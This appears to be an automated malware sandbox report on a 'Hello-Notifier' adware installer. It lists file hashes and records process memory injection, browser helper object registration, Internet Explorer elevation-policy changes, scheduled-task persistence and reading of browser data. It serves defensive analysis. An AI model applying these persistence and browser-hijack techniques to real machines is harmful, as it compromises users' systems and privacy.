C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 064d2a2851c44f039fa89e24672ec065 |
| SHA1 | 2b6a7e3b294a73c63d8d013541bd70617dfb026a |
| SHA256 | f2d61b9b2d422007fc273a93c6718a7d7264e5245fde3d2716d40a63340fdd07 |
| SHA512 | 93dcfc3ee338b98508f784470347789d4cb6a49fb4c2d0d3c28fc924477c577ff506da787ca6b71f79e3eeac85d63bf3ddc3dc6805d95cb22fbde4aceea5d397 |
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894741.log
| MD5 | 995d53ca0536f2ee156c81f2614c9b2e |
| SHA1 | c56f2b1696ec78c70ca0255a2741bd84795e2136 |
| SHA256 | d697ed3d474ab83263555f59d5401b3a8a81a9a433e7152b2644f6813e61bba8 |
| SHA512 | 17df65e3eb2375d35d670576faa8dd360d8d4ce6f74f0dce1d8ae0c1b1f30fa7ad46dfa31ee195748d44c4b73317247abdbaa0975ea9586f5d4b68d98da76301 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 6d586d990046caa6363e0cfcf654f198 |
| SHA1 | b2bac57dfd1fca1fdfe8c233febcb6486c54fa16 |
| SHA256 | 7dccabfab5396ca85ac6c45ba244d25c58279dbec948cda456355ef32e7ca0a1 |
| SHA512 | 199ea6c9c050c1182736adc04aa6b021a7ebf9afe486fdc551f3bf2191e102fb8e61aefa4d850d6714e24cd3cd109b172bcbd857601513bdcfa1095eea252b68 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 4cf2227b60c543ab53e2e4bc710700f4 |
| SHA1 | c1811d55523373c6144f165f48fec686cd31e7d1 |
| SHA256 | fdd5b3df83a9e8a15114785a58e8c65cbf0c577d2ea124db12646c587daca1cf |
| SHA512 | d862d1d373820d03e6da4b19a4cfaa08c4bf213eec1059c3c08606eea393e31b04b1a135b58ef0e41dd8ac5a1a40777902423e41cfe0a6f02220f72e574caeea |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhzluvd5.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png
| MD5 | 8b1eb9cb80417ec0022d278a44ab1dc7 |
| SHA1 | c49eb73f79e70b8ed96d91ef62f0bc344e41219a |
| SHA256 | e358d97ba4c51b987fe73ea0ac0f14f9b2375e299f3e859fc37c21ab8b051ee6 |
| SHA512 | 0324f2785d09f04c5be9ee77f1cb80a7afe06d66672baa862f63ec8ac59a2ae58199db91bb28e18409e918b222dcf09269013a270284213473ffa974d842c7d7 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | e6d0a9a8cb734bc1f13d57c730e129fa |
| SHA1 | e5065caded5b9f4f7f38a6120d4b84b8aca33bfd |
| SHA256 | f966a16b792a66563a303797075aa68ea471adbd7fcf0c9491604554c7224ee0 |
| SHA512 | 802864ae5a1d50b0ad1e0acd5d922b116d68213c1792e7462fd0f1d314d2cfd1237d970e3e6577507180d6a2af947746a61798264602c19c292f89eaddf84485 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\ExecDos.dll
| MD5 | ebcf9f71d804abab3c2e5ce4c17dc22e |
| SHA1 | 17d13084e75cbfa5fbfdd0025e9a0ee5772ae765 |
| SHA256 | d387b725afbd2a6f9b44999278d21025fae55b391e45f7751b88dfb13511a993 |
| SHA512 | 5576396c2d885c039668d7f401eeee583eb4de39e8497c3aaec32d47f4417a522fe6786c111d50a5fba7570f50e84144ef3a8aea42677d170e79114343c3a4a1 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 948956ea00a342ed2fbeb9b9d848cdb4 |
| SHA1 | 3d4d189e3a86c349ebe8b9c18dde9763af31e8d2 |
| SHA256 | 82176760af569cd0760edd89babe7daa0b6e66db583e70fe4783271e6da8f151 |
| SHA512 | 05c5220da5c94e2a729ba70221519c26947a323df5a386261e87fcb1157e4e48e790789e6c75f66aa1847b4f044e90cb558da9eb46c678fc41704512d05603d8 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | f52e74224837f9291247a4024bed4c8c |
| SHA1 | b6c916b2125f35b017c905814c18d1d65a8aba1f |
| SHA256 | 1db93820da20e9f0f0593b7f8673d1e4a8f8ef7b056e4f4b2e183411a3456863 |
| SHA512 | 6c40cfe789be6702076090956ee567a2e3af2825dc728b026cb86b3b669c54d36af80cab6ed0e01e3cf6e97b28f8352e7aed45c8d76dedce832cdc384b3cf567 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 20936fe789ac5a514a121d89b2f12ee8 |
| SHA1 | 3c870bcf7759eed6ff53035b536d3df06ec9b2a6 |
| SHA256 | bf3e287937ea58b4a02dfff54e42a51fb093b3d9ab676cec35e04c8bbf606cfd |
| SHA512 | fb7970db528e36f600ba5dee318638e74378268642564df1fbfa7288fa67de205f6023f5c37904add46bb7065466439b377b48c8db03d479f33aca964737f6e3 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | c32aae898daaf1ce5c2c1245e1779e5e |
| SHA1 | 11ff845123b54eeb7d7dfbcae608103d98f93f25 |
| SHA256 | 85e7571a25ad06b5bfdc6213dd353ebf317219cbf5e751af81c01b52ea631215 |
| SHA512 | 93a531c2c58e9a64107f55f9047c7a7a1a4a1e69dfc4aef483b138af5bd7457d07167fa8476feea740b2d0b0bdb44de47b418998d5992d5c2c86f76b8cf41d68 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | b67172dc03787059255910a04e503c1f |
| SHA1 | c5fa607ce7f49ea21be99e85c81e08b48ff6e6a6 |
| SHA256 | a5d9296206bb705d8ea2caa0296ea45b2534f7c0d306a7253f20e90a999f70e0 |
| SHA512 | 835b1672a22466de661a78577f0234bc4ad941a2787acdf695589d1d68d7607328edf9f33f747f6d945b54b9a81fe0893d6af1671c8af054208450a17c61f7b3 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | e3e7b6547cbc72cd52dba5012113cbaf |
| SHA1 | 1c6f747cccd7034b81cf4907f236cbd098fd030b |
| SHA256 | 7333697624997e5b91986eed05d29c24e871c689ccf38aec78b1173936c628bd |
| SHA512 | 7fb9e707afc16da8e0d11dfd8244a345db58f59c6b8b9fc2eba3ba580432164805f715da797c93c7e1d4f9f3bc51cfb5afb3c740abc6901ecf56a6699d01e43f |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 1e1a99d240ed5b18da059b516f339f99 |
| SHA1 | 48aa01a58ba7e98b3e080f7ada1c5697c198298b |
| SHA256 | 9a4fce8f4f6f6697f795220a9889a0063e4496ff568121ef98e2652eec323ad3 |
| SHA512 | 8f1d26b539da067fa3f4cb616b8b165a0f0abd6e923ecf20a68039ab5c0ff139df236703f5b42ebc20b4c6c9d7e2385430ebef61a5c20e22311880b14c3f7634 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 24e88dfa25d52544039eed843dec878d |
| SHA1 | a4a49a2ad1fca719e48ca91ec2690effe46c362f |
| SHA256 | 759ef12969121dbd07092c62b7d529584c4115e4690d736bdb5e82f7d41ee765 |
| SHA512 | 7f3888685fd776f36941556c645aee0c692d447d75baad7600c2d36a47e0853f17c178f1e865b3ccde78634c2551eb0c08bb8db586afb42aedec9ccadd6b0822 |
C:\Users\Admin\AppData\Local\Temp\nso408.tmp\temp_file_after.tmp
| MD5 | 9a294e54b99b6ce9d3903bfb7354f88e |
| SHA1 | 82a5811657bd9fe992269f140d0e64281500f098 |
| SHA256 | 72c1270892564c368832db8c464c20b8982191a5f9f634cc6c5f4954c47126b7 |
| SHA512 | c0ac7cc9d90c35c980a533cef369d819da91eaeeae6569e04bf0c40fb9397aa263890a5a2570f3dca4e162d6e62afd56956dc3037e63909fc83e0c798a13d49e |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
114s
Max time network
116s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3008 wrote to memory of 4876 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4876 -ip 4876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
15s
Max time network
17s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 224
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
115s
Max time network
118s
Command Line
Signatures
Checks for common network interception software
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" | C:\Windows\system32\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\37928.xpi | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Installer.log | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\utils.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\background.html | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Hello-Notifier\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-updater.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File opened for modification | C:\Windows\Tasks\Hello-Notifier-codedownloader.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| File created | C:\Windows\Tasks\temp_Hello-Notifier-enabler.job | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
